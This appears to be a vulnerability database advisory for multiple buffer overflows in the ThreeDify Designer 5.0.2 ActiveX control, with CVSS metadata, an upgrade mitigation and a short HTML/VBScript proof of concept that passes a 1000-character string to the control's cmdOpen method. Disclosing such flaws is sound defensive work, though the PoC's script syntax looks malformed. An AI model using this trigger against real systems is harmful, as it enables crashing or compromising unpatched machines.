vendor:
ThreeDify Designer
by:
High-Tech Bridge SA Security Research Lab
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: ThreeDify Designer
Affected Version From: 5.0.2
Affected Version To: 5.0.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011
Multiple Buffer Overflow Vulnerabilities in ThreeDify Designer ActiveX Control
The vulnerability is caused due to the ThreeDify.ThreeDifyDesigner.1 (ActiveSolid.dll) ActiveX control including the insecure "cmdOpen()" and "cmdSave()" methods. The following PoC code is available: <html><object classid='clsid:32B165C1-AD31-11D5-8889-0010A4C62D06' id='target' /></object><input language=VBScript onclick=Boom() type=button value="Exploit"><script language = 'vbscript'>Sub Boom(){arg1="A"*1000;target.cmdOpen arg1;}</script></html>
Mitigation:
Upgrade to the most recent version